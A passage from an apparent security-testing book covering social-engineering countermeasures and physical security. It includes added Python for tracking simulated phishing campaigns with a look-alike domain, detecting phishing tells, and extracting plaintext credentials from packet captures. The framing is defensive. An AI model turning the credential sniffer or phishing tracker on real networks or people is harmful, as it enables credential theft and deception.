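campaign's failure rate computed. The landing domain, secret, recipients and
the web server log lines below are all constructed for this example.
"""
import hashlib
import hmac
import re
from urllib.parse import parse_qs, urlsplit

LANDING_HOST = "https://login.examp1e-corp.com"  # hypothetical look-alike domain
CAMPAIGN_KEY = b"rotate-me-for-every-campaign"   # hypothetical per-campaign secret


def make_token(email: str, key: bytes = CAMPAIGN_KEY) -> str:
    """Unguessable but reproducible per-recipient token: HMAC of the address."""
    return hmac.new(key, email.strip().lower().encode(), hashlib.sha256).hexdigest()[:16]


def build_campaign(recipients):
    """Return (token -> email) and (email -> lure URL) for the send step."""
    tokens = {make_token(e): e for e in recipients}
    links = {e: f"{LANDING_HOST}/account/verify?t={make_token(e)}" for e in recipients}
    return tokens, links


# Common Log Format line as written by the landing web server.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>GET|POST) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# What each hit on the landing site means for the test subject.
EVENT_PATHS = {
    ("GET", "/track.gif"): "opened",           # tracking pixel in the e-mail body
    ("GET", "/account/verify"): "clicked",     # lure link followed
    ("POST", "/account/verify"): "submitted",  # something typed into the fake form
}
RANK = {"opened": 1, "clicked": 2, "submitted": 3}


def classify_events(log_lines, tokens):
    """Map each recipient to the worst thing they did; unknown tokens are dropped."""
    worst = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("path"))
        tok = parse_qs(url.query).get("t", [None])[0]
        event = EVENT_PATHS.get((m.group("method"), url.path))
        if tok not in tokens or event is None:
            continue  # scanner, bot, or tampered token: not attributable
        email = tokens[tok]
        if RANK[event] > RANK.get(worst.get(email), 0):
            worst[email] = event
    return worst


def report(recipients, worst):
    """Outcome counts plus the failure rate (clicked or submitted)."""
    counts = {"no_action": 0, "opened": 0, "clicked": 0, "submitted": 0}
    for email in recipients:
        counts[worst.get(email, "no_action")] += 1
    failed = counts["clicked"] + counts["submitted"]
    return counts, failed / len(recipients)


# Constructed campaign and access-log excerpt (tokens filled in from the campaign).
RECIPIENTS = ["alice@example.com", "bob@example.com", "carol@example.com", "dave@example.com"]
TOKENS, LINKS = build_campaign(RECIPIENTS)
T = {e: make_token(e) for e in RECIPIENTS}
SAMPLE_LOG = [
    f'10.0.0.5 - - [12/Mar/2016:09:01:12 -0500] "GET /track.gif?t={T["alice@example.com"]} HTTP/1.1" 200 43',
    f'10.0.0.5 - - [12/Mar/2016:09:01:40 -0500] "GET /account/verify?t={T["alice@example.com"]} HTTP/1.1" 200 2210',
    f'10.0.0.5 - - [12/Mar/2016:09:02:03 -0500] "POST /account/verify?t={T["alice@example.com"]} HTTP/1.1" 302 0',
    f'10.0.0.9 - - [12/Mar/2016:09:05:51 -0500] "GET /account/verify?t={T["bob@example.com"]} HTTP/1.1" 200 2210',
    f'10.0.0.12 - - [12/Mar/2016:09:07:20 -0500] "GET /track.gif?t={T["carol@example.com"]} HTTP/1.1" 200 43',
    '203.0.113.7 - - [12/Mar/2016:09:09:00 -0500] "GET /account/verify?t=0123456789abcdef HTTP/1.1" 200 2210',
]


def run_sample():
    return report(RECIPIENTS, classify_events(SAMPLE_LOG, TOKENS))


if __name__ == "__main__":
    counts, rate = run_sample()
    print(counts, f"failure rate {rate:.0%}")
```

Rotate the key for every campaign so tokens from an old test can't be replayed into a new one, and keep the token-to-address map off the landing server itself; the server only needs to log the token.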
Social Engineering Countermeasures
You have only a few good lines of defense against social engineering. Social engineering will put your layered defenses to the true test. Even with strong security controls, a naïve or untrained user can let the social engineer into the network. Never underestimate the power of social engineers — or the willingness of your users to help them get their way.

Policies
Specific policies help ward off social engineering in the long term in the following areas:
Classifying information so that users don't have access to certain levels of information they don't need
Setting up user IDs when hiring employees or contractors
Establishing acceptable computer usage that employees agree to in writing
Removing user IDs for employees, contractors, and consultants who no longer work for the organization
Setting and resetting strong passphrases
Responding quickly to security incidents, such as suspicious behavior and known malware infections
Properly handling proprietary and confidential information
Escorting guests around your building(s)

These policies must be enforceable and enforced for everyone within the organization. Keep them up-to-date, tell your users about them, and, most important, test them.

User awareness and training
One of the best lines of defense against social engineering is training employees to identify and respond to social engineering attacks. User awareness begins with initial training for everyone and follows with security awareness initiatives to keep social engineering defenses fresh in everyone's mind. Align training and awareness with specific security policies — you may also want to have a dedicated security training and awareness policy.

Consider outsourcing security training to a seasoned security trainer. Employees often take training more seriously if it comes from an outsider, similar to how a family member or spouse will ignore what you have to say but take the same words to heart if someone else says it. Outsourcing security training is worth the investment for that reason alone.

While you approach ongoing user training and awareness in your organization, the following tips can help you combat social engineering in the long term:
Treat security awareness and training as a business investment.
Train users on an ongoing basis to keep security fresh in their minds.
Include information privacy and security tasks and responsibilities in everyone's job descriptions.
Tailor your content to your audience whenever possible.
Create a social engineering awareness program for your business functions and user roles.
Keep your messages as nontechnical as possible.
Develop incentive programs for preventing and reporting incidents.
Lead by example.

Share the following tips with your users to help prevent social engineering attacks:
Never divulge any information unless you can validate that the people requesting the information need it and are who they say they are. If a request is made over the telephone, verify the caller's identity and call back on a number you look up yourself, not one the caller gives you.
Never click an e-mail link that supposedly loads a page with information that needs updating. This is especially true for unsolicited e-mails and can be especially tricky on mobile devices, where users often can't see where a link actually leads.
Encourage your users to validate shortened URLs from bit.ly, ow.ly, etc., if they're unsure about their safety or legitimacy. Various websites such as www.checkshorturl.com and http://wheredoesthislinkgo.com offer this service.
Be careful when sharing personal information on social networking sites, such as Facebook or LinkedIn. Also, be on the lookout for people claiming to know you or wanting to be your friend. Their intentions might be malicious.
Escort all guests within the building.
Never open e-mail attachments or other files from strangers.
Never give out passwords or other sensitive information.
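The tells listed in the phishing section (typos aside) and the advice above about links and shortened URLs can be turned into a mechanical check. The following Python is an added example, not code from the book. It flags a generic salutation, urgency wording, a request for secrets, a link whose visible text names one domain while its href points at another, and a host that imitates a trusted domain through digit-for-letter substitution or an embedded brand name; it also shows how to reveal a shortener's destination without visiting it. The trusted domains and the two sample messages are constructed, and the registrable-domain helper is a two-label approximation rather than the public-suffix list.

```python
"""Heuristic phishing indicators (added example; not from the book).

It scores a message on the usual tells: a generic salutation, urgency
wording, a request for secrets, a link whose visible text names one domain
while its href points elsewhere, and a domain that imitates one you trust.
The trusted domains and the two sample messages are constructed.
"""
import re
import unicodedata
import urllib.error
import urllib.request
from urllib.parse import urlsplit

TRUSTED_DOMAINS = {"examplebank.com", "example.com"}  # hypothetical

GENERIC = re.compile(r"\bdear (customer|user|member|valued customer|account holder)\b", re.I)
URGENCY = re.compile(r"\b(urgent|immediately|within 24 hours|suspended|final notice|verify your account)\b", re.I)
SECRETS = re.compile(r"\b(password|passphrase|social security|ssn|pin|security code)\b", re.I)
ANCHOR = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)
DOMAINISH = re.compile(r"[\w.-]+\.[a-z]{2,}", re.I)
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "8": "b"})


def registrable(host: str) -> str:
    """Last two labels; a crude stand-in for the public-suffix list."""
    return ".".join(host.lower().strip(".").split(".")[-2:])


def normalise(domain: str) -> str:
    """Fold accents and digit-for-letter substitutions to plain ASCII."""
    ascii_only = unicodedata.normalize("NFKD", domain).encode("ascii", "ignore").decode()
    return ascii_only.lower().translate(HOMOGLYPHS)


def looks_like_trusted(host: str, trusted=TRUSTED_DOMAINS):
    """Return the trusted domain that host imitates, or None if genuine or unrelated."""
    reg = registrable(host)
    if reg in trusted:
        return None
    folded = normalise(reg)
    for t in sorted(trusted, key=len, reverse=True):  # most specific brand first
        brand = t.split(".")[0]
        if folded == t or folded.replace("-", "") == t or brand in folded.split(".")[0]:
            return t
    return None


def phishing_indicators(subject: str, body_html: str, trusted=TRUSTED_DOMAINS):
    """List of indicators that fired for one message (empty list = nothing suspicious)."""
    text = subject + "\n" + re.sub(r"<[^>]+>", " ", body_html)
    hits = []
    if GENERIC.search(text):
        hits.append("generic salutation")
    if URGENCY.search(text):
        hits.append("urgency")
    if SECRETS.search(text):
        hits.append("asks for sensitive information")
    anchors = ANCHOR.findall(body_html)
    if anchors:
        hits.append("asks user to click a link")
    for href, label in anchors:
        target = urlsplit(href).hostname or ""
        shown = DOMAINISH.search(re.sub(r"<[^>]+>", "", label))
        if shown and registrable(shown.group(0)) != registrable(target):
            hits.append(f"link text says {shown.group(0)} but href goes to {target}")
        imitated = looks_like_trusted(target, trusted)
        if imitated:
            hits.append(f"{target} imitates {imitated}")
    return hits


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # refuse to follow; we only want the Location header


def expand_short_url(url: str, timeout: float = 5.0):
    """Reveal where a shortener (bit.ly, ow.ly, ...) points without visiting the target.

    Needs network access, so it is not exercised by the offline samples below."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(urllib.request.Request(url, method="HEAD"), timeout=timeout) as resp:
            return resp.geturl()  # not a redirect after all
    except urllib.error.HTTPError as err:
        if err.code in (301, 302, 303, 307, 308):
            return err.headers.get("Location")
        raise


# Constructed messages: one lure, one legitimate notice.
SAMPLE_PHISH = (
    "URGENT: your account will be suspended",
    '<p>Dear Customer,</p><p>Verify your account within 24 hours or it will be suspended. '
    'Click <a href="http://examp1ebank.com/login">https://examplebank.com/login</a> '
    'and confirm your password.</p>',
)
SAMPLE_LEGIT = (
    "Your March statement is ready",
    '<p>Hi Alice,</p><p>Your statement is available in online banking. '
    'Sign in from <a href="https://www.examplebank.com/">www.examplebank.com</a> as usual.</p>',
)

if __name__ == "__main__":
    for name, msg in (("phish", SAMPLE_PHISH), ("legit", SAMPLE_LEGIT)):
        print(name, phishing_indicators(*msg))
```

A legitimate notice still trips the "click a link" indicator, which is the point: no single tell is decisive, but a message that fires four or five of them at once deserves a phone call to the sender on a number you already have.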
A few other general suggestions can ward off social engineering:
Never let a stranger connect to one of your network jacks or internal wireless networks — even for a few seconds. Someone with ill intent can place a network analyzer, install malware, or otherwise set up a backdoor that can be remotely accessed when they leave.
Classify your information assets, both hard copy and electronic. Train all employees how to handle each asset type.
Develop and enforce computer media and document destruction policies that help ensure data is handled carefully and stays where it should be. A good resource for information on destruction policies is www.pdaconsulting.com/datadp.htm.
Use cross-shredding paper shredders. Better still, hire a document-shredding company that specializes in confidential document destruction.

The following techniques can reinforce the content of formal training:
New employee orientation, training lunches, e-mails, and newsletters
Social engineering survival brochure with tips and FAQs
Trinkets, such as screen savers, mouse pads, sticky notes, pens, and office posters that bear messages that reinforce security principles

The Appendix lists my favorite security awareness trinkets and tool vendors to improve security awareness and education in your organization.
Physical Security
In This Chapter
Understanding the importance of physical security
Looking for physical security vulnerabilities
Implementing countermeasures for physical security attacks

I strongly believe that information security is more dependent on nontechnical policies and business processes than on the technical hardware and software solutions that many people and vendors swear by. Physical security, which is the protection of physical property, encompasses both technical and nontechnical components, both of which must be addressed.

Physical security is an often-overlooked but critical aspect of an information security program. Your ability to secure your information depends on your ability to physically secure your office, building, or campus. In this chapter, I cover some common physical security weaknesses as they relate to computers and information security that you must seek out and resolve. I also outline free and low-cost countermeasures you can implement to minimize your business's physical vulnerabilities.

I don't recommend breaking and entering, which would be necessary to test certain physical security vulnerabilities fully. Instead, approach those areas to see how far you can get. Take a fresh look — from an outsider's perspective — at the physical vulnerabilities covered in this chapter. You might discover holes in your physical security infrastructure that you had previously overlooked.
Identifying Basic Physical Security Vulnerabilities

Whatever your computer- and network-security technology, practically any hack is possible if an attacker is in your building or data center. That's why looking for physical security vulnerabilities and fixing them before they're exploited is so important.

In small companies, some physical security issues might not be a problem. Many physical security vulnerabilities depend on such factors as:
Size of the building
Number of buildings or office locations
Number of employees
Location and number of building entrance and exit points
Placement of server rooms, wiring closets, and data centers

Literally thousands of possible physical security weaknesses exist. The bad guys are always on the lookout for them — so you should look for these issues first. Here are some examples of physical security vulnerabilities I've found when performing security assessments for my clients:
No receptionist in a building to monitor who's coming and going
No visitor sign-in or escort required for building access
Employees overly trusting of visitors because they wear vendor uniforms or say they're in the building to work on the copier or computers
No access controls on doors, or the use of traditional keys that can be duplicated with no accountability
Doors propped open
IP-based video, access control, and data center management systems accessible via the network with vendor default user IDs and passwords
Publicly accessible computer rooms
Unsecured backup media such as tapes, hard drives, and CDs/DVDs
Sensitive information stored in hard-copy format lying around cubicles rather than being stored in locking filing cabinets
Unsecured computer hardware, especially routers, switches, and unencrypted laptops
Sensitive information being thrown away in trash cans rather than being shredded or placed in a shred container

When these physical security vulnerabilities are uncovered, bad things can happen. All it takes to exploit these weaknesses is an unauthorized individual entering your building.
Pinpointing Physical Vulnerabilities in Your Office

Many potential physical security exploits seem unlikely, but they can occur to organizations that don't pay attention to physical security risks. The bad guys can exploit many such vulnerabilities, including weaknesses in a building's infrastructure, office layout, computer-room access, and design. In addition to these factors, consider the facility's proximity to local emergency assistance (police, fire, and ambulance) and the area's crime statistics (burglary, breaking and entering, and so on) so you can better understand what you're up against.

Look for the vulnerabilities discussed in the following sections when assessing your organization's physical security. This won't take a lot of technical savvy or expensive equipment. Depending on the size of your office or facilities, these tests shouldn't take much time either. The bottom line is to determine whether the physical security controls are adequate given what's at stake. Above all, be practical and use common sense.

Building infrastructure
Doors, windows, and walls are critical components of a building — especially for a data center or an area where confidential information is stored.

Attack points
Criminals can exploit a handful of building infrastructure vulnerabilities. Consider the following commonly overlooked attack points:
Are doors propped open? If so, why?
Can gaps at the bottom of critical doors allow someone using a balloon or other device to trip a sensor on the inside of an otherwise "secure" room?
Would it be easy to force doors open? A simple kick near the doorknob is usually enough for standard doors.
What is the building or data center made of (steel, wood, concrete), and how sturdy are the walls and entryways? How resilient is the material to earthquakes, tornadoes, strong winds, heavy rains, and vehicles driving into the building? Would these disasters leave the building exposed so that looters and others with malicious intent could gain access to the computer room or other critical areas?
Are any doors or windows made of glass? Is this glass clear? Is the glass shatterproof or bulletproof?
Do door hinges on the outside make it easy for intruders to unhook them?
Are doors, windows, and other entry points wired to an alarm system?
Are there drop ceilings with tiles that can be pushed up?
Are the walls slab-to-slab? If not, someone could easily scale the walls, bypassing any door or window access controls.

Countermeasures
Many physical security countermeasures for building vulnerabilities might require other maintenance, construction, or operations experts. If building infrastructure is not your forte, you can hire outside experts during the design, assessment, and retrofitting stages to ensure that you have adequate controls. Here are some of the best ways to solidify building security:
Strong doors and locks
Windowless walls around data centers
Signage that makes it clear what's where and who's allowed
A continuously monitored alarm system with network-based cameras located at all access areas
Lighting (especially around entry and exit points)
Mantraps and sally ports that allow only one person at a time to pass through a door
Fences (with barbed wire or razor wire if needed)
Utilities
You must consider building and data center utilities, such as power, water, generators, and fire suppression, when assessing physical security. These utilities can help fight off incidents and keep other access controls running during a power loss. You have to be careful, though, as they can also be used against you if an intruder enters the building.

Attack points
Intruders often exploit utility-related vulnerabilities. Consider the following attack points, which are commonly overlooked:
Is power-protection equipment (surge protectors, uninterruptible power supplies [UPSs], and generators) in place? How easily accessible are the on/off switches on these devices? Can an intruder walk in and flip a switch? Can an intruder simply scale a wood fence or cut off a simple lock and access critical equipment?
When the power fails, what happens to physical security mechanisms? Do they fail open, allowing anyone through, or fail closed, keeping everyone in or out until the power is restored? Life-safety codes generally require that people can always get out, so the usual compromise is a door that fails secure for entry while still allowing free egress; check that this is what your locks actually do.
Where are fire-detection and -suppression devices — including alarm sensors, extinguishers, and sprinkler systems — located? Determine how a malicious intruder can abuse them. Are they accessible via a wireless or local network with default login credentials? Perhaps they're accessible over the Internet? Are these devices placed where they can harm electronic equipment during a false alarm?
Where are water and gas shutoff valves located? Can you access them, or would you have to call maintenance personnel when an incident arises?
Are local telecom wires (both copper and fiber) that run outside of the building located above ground, where someone can tap into them with telecom tools? Can digging in the area cut them easily? Are they located on telephone poles that are vulnerable to traffic accidents or weather-related incidents?

Countermeasures
You might need to involve outside experts during the design, assessment, or retrofitting stages. The key is placement:
Ensure that major utility controls are placed behind closed and lockable doors or fenced areas, out of sight of people passing through or nearby.
Ensure that any devices accessible over the network or Internet are tested using vulnerability scanners and other techniques I've outlined in this book. If they don't have to be network- or Internet-accessible, disable that feature or limit who can access the systems via firewall rules or a network access control list.
Ensure that someone walking through or near the building cannot access the controls to turn them on and off.

Security covers for on/off switches and thermostat controls, and locks for server power buttons, USB ports, and PCI expansion slots, can be effective defenses. Just don't depend on them fully, because someone with a hammer (or strong will) can easily crack them open.

I once assessed the physical security of an Internet colocation facility for a very large computer company. I made it past the front guard and tailgated through all the controlled doors to reach the data center. After I was inside, I walked by equipment that was owned by very large companies, such as servers, routers, firewalls, UPSs, and power cords. All this equipment was completely exposed to anyone walking in that area. A quick flip of a switch or an accidental trip over a network cable dangling to the floor could bring an entire shelf — and a global e-commerce system — to the ground.
Office layout and usage
Office design and usage can either help or hinder physical security.

Attack points
Intruders can exploit various weaknesses around the office. Consider these attack points:
Does a receptionist or security guard monitor traffic in and out of the main doors of the building?
Do employees have confidential information on their desks? What about mail and other packages — do they lie around outside someone's door or, even worse, outside the building, waiting for pickup?
Where are trash cans and dumpsters located? Are they easily accessible by anyone? Are recycling bins or shredders used?

Open recycling bins and other careless handling of trash are invitations for dumpster diving. People with ill intent often search for confidential company information and customer records in the trash — and they're often very successful! Dumpster diving can lead to many security exposures.

How secure are the mail and copy rooms? If intruders can access these rooms, they can steal mail or company letterhead to use against you. They can also use and abuse your fax machine(s), assuming you still have those!
Are closed-circuit television (CCTV) or IP-based network cameras used and monitored in real time? If your setup is less proactive and more as-needed, are you confident that you'll be able to quickly access videos and related logs when you need them? Have your network cameras and digital video recorders (DVRs) been hardened from attack — or at least have the default login credentials been changed? This is a security flaw that you can predict with near 100-percent certainty on practically all types of networks, from public utility companies to hospitals to manufacturing companies and all types of businesses in between.
What access controls are on doors? Are regular keys, card keys, combination locks, or biometrics used? Who can access these keys, and where are they stored?

Keys and programmable keypad combinations are often shared among users, making accountability difficult to determine. Find out how many people share these combinations and keys.

I once came across a situation for a client where the front lobby entrance was unmonitored. It also happened to have a Voice over IP (VoIP) phone available for anyone to use. But the client did not consider that anyone could enter the lobby, disconnect the VoIP phone (or use the phone's data port), plug a laptop computer into the connection, and have full access to the network with minimal chance that the intruder would ever be questioned about what he or she was doing. This type of situation is easily prevented by disabling network connections in unmonitored areas or, where the phone's data port is needed, by separating voice and data traffic at the switch or physical network level.

Countermeasures
What's challenging about physical security is the fact that security controls are often reactive. Some controls are preventive or detective (they deter, detect, or delay), but they're not foolproof. Putting simple measures, such as the following, in place can help reduce your exposure to building and office-related vulnerabilities:
A receptionist or a security guard who monitors people coming and going. This is the simplest countermeasure. This person can ensure that every visitor signs in and that all new or untrusted visitors are always escorted.
Make it policy and procedure for all employees to question strangers and report strange behavior in the building.
Employees Only or Authorized Personnel Only signs show the bad guys where they should go instead of deterring them from entering. It's security by obscurity, but not calling attention to the critical areas may be the best approach.
Single entry and exit points to a data center.
Secure areas for dumpsters.
CCTV or IP-based video cameras for monitoring critical areas, including dumpsters.
Cross-cut shredders or secure recycling bins for hard-copy documents.
Limited numbers of keys and passcode combinations, with usage that's also logged and monitored.
Make keys and passcodes unique for each person whenever possible or, better yet, don't use them at all. Use electronic badges that can be better controlled and monitored instead.
Biometric identification systems can be very effective, but they can also be expensive and difficult to manage.
Network components and computers
After intruders obtain physical access to a building, they might look for the server room and other easily accessible computer and network devices.

Attack points
The keys to the kingdom are often as close as someone's desktop computer and not much farther than an unsecured computer room or wiring closet.

Intruders can do the following:
Obtain network access and send malicious e-mails as a logged-in user.
Crack and obtain passwords directly from the computer by booting it with a tool such as the ophcrack Live CD (http://ophcrack.sourceforge.net). This works only if the machine will boot from removable media and its disk isn't encrypted, which is one reason the countermeasures later in this section call for full disk encryption. I cover this tool and more password hacks in Chapter 8.
Place penetration drop boxes such as those made by Pwnie Express (https://www.pwnieexpress.com) in a standard power outlet. These devices allow a malicious intruder to connect back into the system via a cellular connection to perform their dirty deeds. This is a really sneaky (spy-like) means of intrusion that you can use as part of your own security testing.
Steal files from the computer by copying them to a removable storage device (such as a phone or USB drive) or by e-mailing them to an external address.
Enter unlocked computer rooms and mess around with servers, firewalls, and routers.
Walk out with network diagrams, contact lists, and disaster recovery plans.
Obtain phone numbers from analog lines and circuit IDs from T1, Metro Ethernet, and other telecom equipment to use in subsequent attacks.

Practically every bit of unencrypted information that traverses the network can be recorded for future analysis through one of the following methods:
Connecting a computer running network analyzer software (including a tool such as Cain and Abel, which I cover in Chapter 9) to a switch on your network. On a switched network the analyzer sees only its own traffic and broadcasts unless it is on a mirror (SPAN) port or uses ARP poisoning to pull other hosts' traffic through itself, which is exactly what Cain and Abel provides.
Installing network analyzer software on an existing computer.

A network analyzer is very hard to spot. I cover network analyzers capturing packets on switched Ethernet networks in more detail in Chapter 9.

How would someone access or use this information in the future?

The easiest attack method is to install remote-administration software on the computer, such as VNC (www.realvnc.com). A crafty hacker with enough time can bind a public IP address to the computer if the computer is outside the firewall. Hackers or malicious insiders with enough network knowledge (and time) can configure new firewall rules to do this.
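What "recording unencrypted information for future analysis" yields in practice is easiest to see with a capture file. The following Python is an added example, not code from the book or from Cain and Abel: it builds a small pcap file in memory (the frames and HTTP requests are constructed, so nothing is captured from a live network), walks its Ethernet/IPv4/TCP records with struct, and pulls out HTTP Basic credentials and form logins. Pointed at a real capture saved by tcpdump or Wireshark it does the same thing, which is why the countermeasures that follow stress encryption rather than hoping nobody is listening.

```python
"""Parse a pcap capture and pull plaintext credentials out of unencrypted HTTP
(added example; not from the book). The capture is constructed in memory.
"""
import base64
import re
import struct
from urllib.parse import parse_qs


def _ipv4(addr: str) -> bytes:
    return bytes(int(o) for o in addr.split("."))


def build_packet(src, sport, dst, dport, payload: bytes) -> bytes:
    """Ethernet/IPv4/TCP frame around payload (checksums left zero; fine for parsing)."""
    eth = b"\x00\x11\x22\x33\x44\x55" + b"\x66\x77\x88\x99\xaa\xbb" + b"\x08\x00"
    tcp = struct.pack(">HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    total = 20 + len(tcp) + len(payload)
    ip = struct.pack(">BBHHHBBH4s4s", 0x45, 0, total, 1, 0x4000, 64, 6, 0, _ipv4(src), _ipv4(dst))
    return eth + ip + tcp + payload


def build_pcap(frames) -> bytes:
    """Classic libpcap file: 24-byte global header, then 16-byte record headers."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # linktype 1 = Ethernet
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1457800000 + i, 0, len(f), len(f)) + f
    return out


def iter_tcp_payloads(pcap: bytes):
    """Yield (src_ip, dst_ip, dst_port, tcp_payload) for each TCP segment in a pcap blob."""
    magic = struct.unpack("<I", pcap[:4])[0]
    endian = "<" if magic == 0xA1B2C3D4 else ">"
    linktype = struct.unpack(endian + "I", pcap[20:24])[0]
    if linktype != 1:
        raise ValueError("this example handles Ethernet captures only")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl, _ = struct.unpack(endian + "IIII", pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl]
        off += 16 + incl
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue                      # not IPv4
        ihl = (frame[14] & 0x0F) * 4
        if frame[23] != 6:
            continue                      # not TCP
        ip_total = struct.unpack(">H", frame[16:18])[0]
        src = ".".join(map(str, frame[26:30]))
        dst = ".".join(map(str, frame[30:34]))
        tcp = frame[14 + ihl:14 + ip_total]
        dport = struct.unpack(">H", tcp[2:4])[0]
        doff = (tcp[12] >> 4) * 4
        yield src, dst, dport, tcp[doff:]


BASIC_RE = re.compile(rb"Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", re.I)
HOST_RE = re.compile(rb"Host:\s*(\S+)", re.I)


def extract_credentials(pcap: bytes):
    """Return [(source_ip, target, username, password)] from HTTP Basic auth and form logins."""
    found = []
    for src, dst, dport, payload in iter_tcp_payloads(pcap):
        if dport not in (80, 8080):
            continue                      # only plaintext web traffic is readable
        host = HOST_RE.search(payload)
        target = host.group(1).decode(errors="replace") if host else dst
        m = BASIC_RE.search(payload)
        if m:
            user, _, pwd = base64.b64decode(m.group(1)).decode(errors="replace").partition(":")
            found.append((src, target, user, pwd))
        head, sep, body = payload.partition(b"\r\n\r\n")
        if sep and head.startswith(b"POST") and b"application/x-www-form-urlencoded" in head:
            form = parse_qs(body.decode(errors="replace"))
            user = next((form[k][0] for k in ("username", "user", "login", "email") if k in form), None)
            pwd = next((form[k][0] for k in ("password", "passwd", "pass") if k in form), None)
            if user and pwd:
                found.append((src, target, user, pwd))
    return found


# Constructed traffic: a camera fetched with default Basic credentials, an SSH
# banner (encrypted, ignored) and an intranet form login.
CAMERA_REQ = (b"GET /cgi-bin/snapshot.cgi HTTP/1.1\r\nHost: 10.0.0.50\r\n"
              b"Authorization: Basic " + base64.b64encode(b"admin:admin") + b"\r\n\r\n")
FORM = b"username=jsmith&password=Summer2016%21"
LOGIN_REQ = (b"POST /login HTTP/1.1\r\nHost: intranet.example.com\r\n"
             b"Content-Type: application/x-www-form-urlencoded\r\n"
             b"Content-Length: " + str(len(FORM)).encode() + b"\r\n\r\n" + FORM)
SAMPLE_PCAP = build_pcap([
    build_packet("10.0.0.23", 51000, "10.0.0.50", 80, CAMERA_REQ),
    build_packet("10.0.0.23", 51001, "10.0.0.50", 22, b"SSH-2.0-OpenSSH_7.2\r\n"),
    build_packet("10.0.0.31", 51002, "10.0.0.10", 80, LOGIN_REQ),
])

if __name__ == "__main__":
    for hit in extract_credentials(SAMPLE_PCAP):
        print("%s -> %s  %s : %s" % hit)
```

The parser only reassembles nothing: it reads one segment at a time, so a login split across two TCP segments would be missed. That is enough to make the point, and it is the behaviour to keep in mind when judging how "hard to spot" a sniffer's output is: anything sent in the clear is as good as handed over.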
Also, consider these other physical vulnerabilities:
How easily can computers be accessed during regular business hours? During lunchtime? After hours?
Are computers — especially laptops — secured to desks with locks? Are their hard drives encrypted in the event one is lost or stolen? Do their screens lock after a short period of non-use?
Do employees typically leave their phones and tablets lying around unsecured? What about when they're traveling or working from home, hotels, or the local coffee shop?
Are passwords stored on sticky notes on computer screens, keyboards, or desks? This is a long-running joke in our circles, but it still happens!
Are backup media lying around the office or data center, susceptible to theft?
Are safes used to protect backup media? Are they specifically rated for media, to keep backups from melting during a fire? Who can access the safe?

Safes are often at great risk because of their size and value. Also, they are typically unprotected by the organization's regular security controls. Are specific policies and technologies in place to help protect them?

Are locking laptop bags required? What about power-on passwords? Encryption can solve a lot of physical security-related weaknesses.
How easily can someone connect to a wireless access point (AP) signal or the AP itself to join the network? Rogue access points are also something to consider. I cover wireless networks in more detail in Chapter 10.
Are network firewalls, routers, switches, and hubs (basically, anything with an Ethernet connection) easily accessible, which would enable an attacker to plug into the network easily?
Are all cables patched through on the patch panel in the wiring closet so all network drops are live, as in the case of the unmonitored lobby area I mention earlier?

This setup is very common but a bad idea because it allows anyone to plug into the network anywhere and gain access. This is not only a great way to allow intruders onto your network, but it can also be used as a means for spreading malware. Leave unused jacks unpatched, shut down unused switch ports, and consider 802.1X port authentication so that a live jack alone doesn't grant access.
Countermeasures
Network and computer security countermeasures are some of the simplest to implement yet the most difficult to enforce because they involve people and their everyday actions. Here's a rundown of these countermeasures:
Make your users aware of what to look out for so you have extra sets of eyes and ears helping you out.
Require users to lock their screens — which only takes a few clicks or keystrokes — when they leave their computers.
Ensure that strong passwords are used. I cover this topic in Chapter 8.
Require laptop users to lock their systems to their desks with a locking cable. This is especially important for remote workers and travelers as well as in larger companies or locations that receive a lot of foot traffic.
Require all laptops to use full disk encryption technologies, such as BitLocker in Windows (ideally combined with its central management software, Microsoft BitLocker Administration and Monitoring, which can be found at https://technet.microsoft.com/en-us/windows/hh826072.aspx) or WinMagic SecureDoc Full Disk Encryption (www.winmagic.com/products/securedoc-full-disk-encryption).
Keep server rooms and wiring closets locked and monitor those areas for any wrongdoing.
Keep a current inventory of hardware and software within the organization so it's easy to determine when extra equipment appears or when equipment is missing. This is especially important in computer rooms.
Properly secure computer media when stored and during transport.
Scan for rogue wireless access points.
Use cable traps and locks that prevent intruders from unplugging network cables from patch panels or computers and using those connections for their own computers.
Use a bulk eraser on magnetic media before they're discarded. A bulk eraser works only on magnetic media; SSDs and USB flash drives need a firmware secure-erase command or physical destruction.
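The inventory countermeasure above only pays off if something regularly compares the register with what is actually on the wire and in the air, so here is that reconciliation as an added example (not from the book) in Python. The inventory, the `ip neigh` output and the `iw` scan excerpt are constructed; real input would come from the switch's MAC address table or a DHCP lease file and from a wireless survey. It flags MAC addresses that aren't in the register, server-room assets that failed to answer, and access points broadcasting your SSID from a BSSID you don't own.

```python
"""Reconcile the asset inventory with what is seen on the network
(added example; not from the book). All inputs below are constructed.
"""
import re
from dataclasses import dataclass

MAC_RE = re.compile(r"(?:[0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2}")


def norm_mac(mac: str) -> str:
    """Lower-case, colon-separated form so switch, Windows and Linux output compare equal."""
    return mac.lower().replace("-", ":")


@dataclass(frozen=True)
class Asset:
    mac: str
    owner: str
    location: str


def parse_ip_neigh(lines):
    """mac -> ip from Linux `ip neigh` output; entries that never resolved carry no MAC."""
    seen = {}
    for line in lines:
        m = MAC_RE.search(line)
        if m and "FAILED" not in line:
            seen[norm_mac(m.group(0))] = line.split()[0]
    return seen


def parse_wifi_scan(lines):
    """(bssid, ssid) pairs from `iw dev wlan0 scan` style output."""
    aps, bssid = [], None
    for line in lines:
        if line.startswith("BSS "):
            bssid = norm_mac(MAC_RE.search(line).group(0))
        elif line.strip().startswith("SSID:") and bssid:
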